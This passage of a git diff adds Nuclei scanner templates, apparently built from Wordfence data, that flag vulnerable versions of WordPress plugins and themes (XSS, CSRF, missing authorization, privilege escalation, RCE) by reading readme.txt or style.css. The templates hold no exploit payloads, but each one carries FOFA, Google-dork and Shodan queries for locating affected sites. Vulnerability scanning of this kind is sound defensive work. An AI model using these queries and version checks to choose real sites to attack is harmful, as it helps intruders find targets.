possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12449 + metadata: + fofa-query: "wp-content/plugins/video-share-vod/" + google-query: inurl:"/wp-content/plugins/video-share-vod/" + shodan-query: 'vuln:CVE-2024-12449' + tags: cve,wordpress,wp-plugin,video-share-vod,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/video-share-vod/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "video-share-vod" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.30') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12454.yaml b/poc/cve/CVE-2024-12454.yaml new file mode 100644 index 0000000000..88ce5f9379 --- /dev/null +++ b/poc/cve/CVE-2024-12454.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12454-5621596be5bd586ce99dcc404a2f85f8 + +info: + name: > + Affiliate Program Suite — SliceWP Affiliates <= 1.1.23 - Cross-Site Request Forgery to Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Affiliate Program Suite — SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73aad911-531b-4118-9d39-27cbae75db01?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12454 + metadata: + fofa-query: "wp-content/plugins/slicewp/" + google-query: inurl:"/wp-content/plugins/slicewp/" + shodan-query: 'vuln:CVE-2024-12454' + tags: cve,wordpress,wp-plugin,slicewp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slicewp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slicewp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.23') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12500.yaml b/poc/cve/CVE-2024-12500.yaml new file mode 100644 index 0000000000..14c86607bd --- /dev/null +++ b/poc/cve/CVE-2024-12500.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12500-fda26400f9dece6114dcd6955fceb5ac + +info: + name: > + Philantro – Donations and Donor Management <= 5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Philantro – Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12500 + metadata: + fofa-query: "wp-content/plugins/philantro/" + google-query: inurl:"/wp-content/plugins/philantro/" + shodan-query: 'vuln:CVE-2024-12500' + tags: cve,wordpress,wp-plugin,philantro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/philantro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "philantro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12513.yaml b/poc/cve/CVE-2024-12513.yaml new file mode 100644 index 0000000000..6dcbc06529 --- /dev/null +++ b/poc/cve/CVE-2024-12513.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12513-826c2ee2f56d5d07458720b488403657 + +info: + name: > + Contests by Rewards Fuel <= 2.0.65 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RF_CONTEST' shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12513 + metadata: + fofa-query: "wp-content/plugins/contests-from-rewards-fuel/" + google-query: inurl:"/wp-content/plugins/contests-from-rewards-fuel/" + shodan-query: 'vuln:CVE-2024-12513' + tags: cve,wordpress,wp-plugin,contests-from-rewards-fuel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contests-from-rewards-fuel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contests-from-rewards-fuel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.65') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12554.yaml b/poc/cve/CVE-2024-12554.yaml new file mode 100644 index 0000000000..af6e40fef6 --- /dev/null +++ b/poc/cve/CVE-2024-12554.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12554-f7e364a88d43fcf0d377a1e86841f6a0 + +info: + name: > + Peter’s Custom Anti-Spam <= 3.2.3 - Cross-Site Request Forgery via cas_register_post Function + author: topscoder + severity: medium + description: > + The Peter’s Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c52ca89-4f13-41da-bc10-80d212c6219c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-12554 + metadata: + fofa-query: "wp-content/plugins/peters-custom-anti-spam-image/" + google-query: inurl:"/wp-content/plugins/peters-custom-anti-spam-image/" + shodan-query: 'vuln:CVE-2024-12554' + tags: cve,wordpress,wp-plugin,peters-custom-anti-spam-image,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peters-custom-anti-spam-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peters-custom-anti-spam-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml b/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml new file mode 100644 index 0000000000..b57bb061f4 --- /dev/null +++ b/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12560-449215acaf31dbe73bdd1b194455c475 + +info: + name: > + Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication + author: topscoder + severity: low + description: > + The Button Block – Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12560 + metadata: + fofa-query: "wp-content/plugins/button-block/" + google-query: inurl:"/wp-content/plugins/button-block/" + shodan-query: 'vuln:CVE-2024-12560' + tags: cve,wordpress,wp-plugin,button-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "button-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12596.yaml b/poc/cve/CVE-2024-12596.yaml new file mode 100644 index 0000000000..1555a240f0 --- /dev/null +++ b/poc/cve/CVE-2024-12596.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12596-774434bb9ea28259fa8266e81972c00f + +info: + name: > + LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes <= 7.8.5 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion + author: topscoder + severity: low + description: > + The LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12596 + metadata: + fofa-query: "wp-content/plugins/lifterlms/" + google-query: inurl:"/wp-content/plugins/lifterlms/" + shodan-query: 'vuln:CVE-2024-12596' + tags: cve,wordpress,wp-plugin,lifterlms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/lifterlms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "lifterlms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml b/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml new file mode 100644 index 0000000000..971131143f --- /dev/null +++ b/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12626-300286d442729c59242e3ed40a31f2a5 + +info: + name: > + AutomatorWP <= 5.0.9 - Reflected Cross-Site Scripting via a-0-o-search_field_value + author: topscoder + severity: medium + description: > + The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘a-0-o-search_field_value’ parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin's import and code action feature, this vulnerability can be leveraged to execute arbitrary code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-12626 + metadata: + fofa-query: "wp-content/plugins/automatorwp/" + google-query: inurl:"/wp-content/plugins/automatorwp/" + shodan-query: 'vuln:CVE-2024-12626' + tags: cve,wordpress,wp-plugin,automatorwp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/automatorwp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "automatorwp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml b/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml new file mode 100644 index 0000000000..a4dee6440c --- /dev/null +++ b/poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa + +info: + name: > + Woffice <= 5.4.14 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Woffice CRM theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.4.14. This makes it possible for unauthenticated attackers to gain access to administrator accounts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43234 + metadata: + fofa-query: "wp-content/themes/woffice/" + google-query: inurl:"/wp-content/themes/woffice/" + shodan-query: 'vuln:CVE-2024-43234' + tags: cve,wordpress,wp-theme,woffice,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/woffice/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woffice" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml b/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml new file mode 100644 index 0000000000..a4bbf0373d --- /dev/null +++ b/poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2 + +info: + name: > + s2Member (Pro) <= 241114 - Unauthenticated Remote Code Execution + author: topscoder + severity: critical + description: > + The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions (Pro) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc6de82-a4c1-4125-9be0-4fb6de42c178?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-51815 + metadata: + fofa-query: "wp-content/plugins/s2member/" + google-query: inurl:"/wp-content/plugins/s2member/" + shodan-query: 'vuln:CVE-2024-51815' + tags: cve,wordpress,wp-plugin,s2member,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/s2member/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "s2member" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 241114') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml b/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml new file mode 100644 index 0000000000..22b4cab3b4 --- /dev/null +++ b/poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blaze Online eParcel for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eeca3208-2cab-4c03-935f-8f657d7ca87f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54240 + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54240' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml b/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml new file mode 100644 index 0000000000..da7b407476 --- /dev/null +++ b/poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084 + +info: + name: > + Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Blaze Online eParcel for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da58f0d5-1608-4c45-89a5-bc5bd358263e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54240 + metadata: + fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54240' + tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blaze-online-eparcel-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml b/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml new file mode 100644 index 0000000000..a9387ba47c --- /dev/null +++ b/poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54242-3b5086237f4638cb162a9f792453261e + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Simple Notification plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d6637f7-7035-4355-9c9d-193ea87c6e62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-54242 + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:CVE-2024-54242' + tags: cve,wordpress,wp-plugin,simple-notification,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml b/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml new file mode 100644 index 0000000000..285f6696d7 --- /dev/null +++ b/poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54242-96632825cfd9f5b03b99528997824213 + +info: + name: > + Simple Notification <= 1.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Simple Notification plugin for WordPress is vulnerable to unauthorized access to functionality in versions up to, and including, 1.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to make use of this functionality intended for higher-privileged users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/191521ba-817e-4a7f-99df-3fe9cc1c5de3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-54242 + metadata: + fofa-query: "wp-content/plugins/simple-notification/" + google-query: inurl:"/wp-content/plugins/simple-notification/" + shodan-query: 'vuln:CVE-2024-54242' + tags: cve,wordpress,wp-plugin,simple-notification,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-notification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml b/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml new file mode 100644 index 0000000000..fa2f46c1e1 --- /dev/null +++ b/poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10 + +info: + name: > + Echoza <= 0.1.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Echoza plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3823fedd-f5b9-420d-98b5-8b7bfc6b02de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54243 + metadata: + fofa-query: "wp-content/plugins/echoza/" + google-query: inurl:"/wp-content/plugins/echoza/" + shodan-query: 'vuln:CVE-2024-54243' + tags: cve,wordpress,wp-plugin,echoza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/echoza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "echoza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml b/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml new file mode 100644 index 0000000000..575e4a7673 --- /dev/null +++ b/poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54244-908fba9dd40f4471beff68bece44dab3 + +info: + name: > + Easy Replace <= 1.3 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Easy Replace plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8536e655-72cc-4d7a-8ca0-7ba3042e03c1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54244 + metadata: + fofa-query: "wp-content/plugins/easy-replace/" + google-query: inurl:"/wp-content/plugins/easy-replace/" + shodan-query: 'vuln:CVE-2024-54244' + tags: cve,wordpress,wp-plugin,easy-replace,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml b/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml new file mode 100644 index 0000000000..5f769cdc12 --- /dev/null +++ b/poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml @@ -0,0 +1,59 @@ +id: 